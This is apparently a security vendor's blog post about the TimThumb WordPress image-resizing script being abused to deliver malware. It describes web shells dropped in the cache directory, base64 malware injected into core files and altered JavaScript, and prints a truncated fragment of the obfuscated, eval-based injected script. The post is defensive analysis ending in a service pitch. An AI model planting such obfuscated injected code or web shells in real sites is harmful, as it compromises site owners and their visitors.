• TimThumb Malware

    The ability to integrate useful third party plugins into a CMS like WordPress provides website owners the ability to add new functionality to existing websites. Unfortunately, this feature comes at a price.

    Third party plugins often have security vulnerabilities that allow malicious hackers to break into websites and use them to distribute malware. We take a look at a plugin called TimThumb in this article.

    What is TimThumb?
    TimThumb is a small PHP script for cropping, zooming, and resizing images (jpg, png, gif) on the web. It is used widely on blogs and in other applications.

    The Problem
    The main script associated with TimThumb is called Timthumb.php. This program allows a website owner to offer the visitors to a website, the ability to load images and resize them easily, while at the same time maintaining a cache of images to preserve bandwidth and speed loading.

    It is this functionality which has been a target of the zero-day TimThumb attack. TimThumb allows users to load pictures from external sites and store them in a directory on the web server, which is a really attractive vector for hackers to use in an attack. Keep in mind though, TimThumb does not play any part in executing malicious code. TimThumb is merely being used as a delivery mechanism for the malware.

    Storing externally sourced content in a web server directory which is publicly accessible is the root cause of this issue. The verification mechanism for storage of content and verification of its source is flawed in TimThumb. This flawed mechanism has allowed malicious hackers to distribute malicious code from many websites.

    A very good writeup on this topic is presented here.

    Analysis
    The malware runs each time the page is loaded by the website visitor’s browser. Malicious advertisements are displayed to the user and a malicious redirection may occur (sites we listed in our recent post).

    • A malicious script is often deposited in the cache directory (used by timthumb to store cached images)
      • The malicious scripts may be a c99/c100 shell
      • The malicious shells are web based – giving the malicious hacker remote control of your website, and hosting account
    • Base 64 encoded malware is injected into wp-blog-header.php
    • JavaScript files may be modified (l10n.js and jquery.js are primary targets)

    A sample of the injected code:

    var _0x4ab4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63..
    \x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37..
    eval (function (_0x2f46x1,_0x2f46x2
    

    How do I protect my site?
    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…